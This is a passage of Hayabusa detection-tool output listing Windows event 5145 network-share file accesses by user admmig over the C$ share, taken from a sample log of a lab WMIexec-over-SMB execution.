0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 
